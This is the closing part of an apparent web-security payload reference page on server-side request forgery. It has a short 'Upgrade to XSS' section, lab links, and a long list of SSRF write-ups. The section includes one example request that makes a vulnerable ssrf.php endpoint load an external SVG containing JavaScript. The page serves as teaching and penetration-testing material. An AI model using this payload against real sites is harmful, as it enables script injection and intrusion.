<h2 id="upgrade-to-xss">Upgrade to XSS</h2>
<p>When the SSRF doesn't have any critical impact, the network is segmented and you can't reach other machine, the SSRF doesn't allow you to exfiltrate files from the server.</p>
<p>You can try to upgrade the SSRF to an XSS, by including an SVG file containing Javascript code.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-31-1" name="__codelineno-31-1" href="#__codelineno-31-1"></a>https://example.com/ssrf.php?url<span class="o">=</span>http://brutelogic.com.br/poc.svg
</code></pre></div>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost">PortSwigger - Basic SSRF against the local server</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system">PortSwigger - Basic SSRF against another back-end system</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter">PortSwigger - SSRF with blacklist-based input filter</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter">PortSwigger - SSRF with whitelist-based input filter</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection">PortSwigger - SSRF with filter bypass via open redirection vulnerability</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Server/Server-Side-Request-Forgery">Root Me - Server Side Request Forgery</a></li>
<li><a href="https://www.root-me.org/en/Challenges/Web-Server/Nginx-SSRF-Misconfiguration">Root Me - Nginx - SSRF Misconfiguration</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://www.youtube.com/watch?v=D1S-G8rJrEk">A New Era Of SSRF - Exploiting URL Parsers - Orange Tsai - September 27, 2017</a></li>
<li><a href="https://hackerone.com/reports/374737">Blind SSRF on errors.hackerone.net - chaosbolt - June 30, 2018</a></li>
<li><a href="http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/">ESEA Server-Side Request Forgery and Querying AWS Meta Data - Brett Buerhaus - April 18, 2016</a></li>
<li><a href="https://www.youtube.com/watch?v=66ni2BTIjS8">Hacker101 SSRF - Cody Brocious - October 29, 2018</a></li>
<li><a href="https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF">Hackerone - How To: Server-Side Request Forgery (SSRF) - Jobert Abma - June 14, 2017</a></li>
<li><a href="http://web.archive.org/web/20171220083457/http://www.sxcurity.pro/2017/12/17/hackertarget/">Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity - December 17, 2017</a></li>
<li><a href="http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html">How I Chained 4 Vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! - Orange Tsai - July 28, 2017</a></li>
<li><a href="https://www.dailysecurity.fr/server-side-request-forgery/">Les Server Side Request Forgery : Comment contourner un pare-feu - Geluchat - September 16, 2017</a></li>
<li><a href="https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51">PHP SSRF - @secjuice - theMiddle - March 1, 2018</a></li>
<li><a href="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a">Piercing the Veil: Server Side Request Forgery to NIPRNet Access - Alyssa Herrera - April 9, 2018</a></li>
<li><a href="https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">Server-side Browsing Considered Harmful - Nicolas Grégoire (Agarri) - May 21, 2015</a></li>
<li><a href="https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978">SSRF - Server-Side Request Forgery (Types and Ways to Exploit It) Part-1 - SaN ThosH (madrobot) - January 10, 2019</a></li>
<li><a href="https://hackerone.com/reports/115857">SSRF and Local File Read in Video to GIF Converter - sl1m - February 11, 2016</a></li>
<li><a href="https://hackerone.com/reports/115748">SSRF in https://imgur.com/vidgif/url - Eugene Farfel (aesteral) - February 10, 2016</a></li>
<li><a href="https://hackerone.com/reports/358119">SSRF in proxy.duckduckgo.com - Patrik Fábián (fpatrik) - May 27, 2018</a></li>
<li><a href="https://hackerone.com/reports/382612">SSRF on *shopifycloud.com - Rojan Rijal (rijalrojan) - July 17, 2018</a></li>
<li><a href="https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/">SSRF Protocol Smuggling in Plaintext Credential Handlers: LDAP - Willis Vandevanter (@0xrst) - February 5, 2019</a></li>
<li><a href="http://web.archive.org/web/20170407053309/http://blog.safebuff.com/2016/07/03/SSRF-Tips/">SSRF Tips - xl7dev - July 3, 2016</a></li>
<li><a href="https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/">SSRF's Up! Real World Server-Side Request Forgery (SSRF) - Alberto Wilson and Guillermo Gabarrin - January 25, 2019</a></li>
<li><a href="https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/">SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例 - mrtc0 - September 5, 2018</a></li>
<li><a href="https://github.com/allanlw/svg-cheatsheet">SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - June 12, 2019</a></li>
<li><a href="http://web.archive.org/web/20201107113541/https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/">URL Eccentricities in Java - sammy (@PwnL0rd) - November 2, 2020</a></li>
<li><a href="https://portswigger.net/web-security/ssrf">Web Security Academy Server-Side Request Forgery (SSRF) - PortSwigger - July 10, 2019</a></li>
<li><a href="https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/">X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG (@quanyang) - June 22, 2016</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1zM12.5 7v5.2l4 2.4-1 1L11 13V7zM11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">November 30, 2024</span>
</span>
</aside>
<div class="social-container">
<b>Share this content</b>
<div class="a2a_kit a2a_kit_size_32 a2a_default_style">
<a class="a2a_dd" href="https://www.addtoany.com/share"></a>
<a class="a2a_button_x"></a>
<a class="a2a_button_telegram"></a>
<a class="a2a_button_linkedin"></a>
<a class="a2a_button_email"></a>
<a class="a2a_button_microsoft_teams"></a>
</div>
<br>
<script async src="https://static.addtoany.com/menu/page.js"></script>
<script defer src="https://cloud.umami.is/script.js" data-website-id="82be5164-e1f3-4cb0-bd22-20e02086d3d4"></script>
</div>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "content.action.edit", "content.action.view", "content.tooltips", "navigation.tracking", "navigation.top", "search.share", "search.suggest"], "search": "../assets/javascripts/workers/search.6ce7567c.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.83f73b43.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink